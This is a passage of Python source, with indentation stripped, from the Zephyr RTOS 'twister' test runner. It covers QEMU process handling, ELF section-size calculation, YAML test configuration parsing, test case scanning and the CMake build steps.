logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in test '%s'" %
(kinfo["type"], d[k], k, name))
return d
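# A minimal usage sketch (hypothetical valid_keys and yaml content) of how
# get_test() combines "common", the per-test section and the valid_keys
# type casting described above:
#
#   parser = TwisterConfigParser("testcase.yaml", schema)
#   parser.load()
#   valid_keys = {"tags": {"type": "set"}, "timeout": {"type": "int", "default": 60}}
#   # for a yaml entry  tests: { sample.basic: { tags: "kernel posix" } }
#   parser.get_test("sample.basic", valid_keys)
#   # -> {"tags": {"kernel", "posix"}, "timeout": 60}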
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, this can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
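# A hypothetical example of the naming scheme enforced above: for
# testcase_root=$ZEPHYR_BASE/tests, workdir="kernel/common" and
# name="kernel.common", get_unique() returns
# "tests/kernel/common/kernel.common"; a name without a dot separator
# (e.g. "common") raises TwisterException.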
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line -- as we only search starting at the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite; this is probably just a client
# of ztest that merely includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
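# A minimal, hypothetical source fragment that the regexes above would
# accept; scan_file() would return (["sem_take", "sem_give"], None) for:
#
#   ztest_test_suite(sem_suite,
#           ztest_unit_test(test_sem_take),
#           ztest_user_unit_test(test_sem_give));
#   ztest_run_test_suite(sem_suite);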
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise TwisterRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
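# A sketch of the decision above, with a hypothetical fixture name:
# harness="console" with harness_config={"fixture": "gpio_loopback"} is
# runnable only if "gpio_loopback" is among the fixtures supplied on the
# command line; an empty harness is always runnable; any other harness
# makes the instance build-only here.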
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# On Windows we currently only support building; running tests is
# still work in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
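# A hypothetical result of the overlay generation above: with
# extra_configs=["CONFIG_FOO=y"], coverage enabled for this platform and
# ASan requested on a "native" platform, twister/testcase_extra.conf
# would contain:
#   CONFIG_FOO=y
#   CONFIG_COVERAGE=y
#   CONFIG_COVERAGE_DUMP=y
#   CONFIG_ASAN=y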
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile(r'(CONFIG_[A-Za-z0-9_]+)[=]"?([^"]*)"?$')
dt_re = re.compile(r'([A-Za-z0-9_]+)[=]"?([^"]*)"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# The build failed; log the output and record the failure (or skip on ROM/RAM overflow)
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
gen_defines_args = "--err-on-deprecated-properties"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}"',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.pid_fn = os.path.join(instance.build_dir, "mdb.pid")
instance.handler.call_west_flash = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process: call cmake and build with the configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
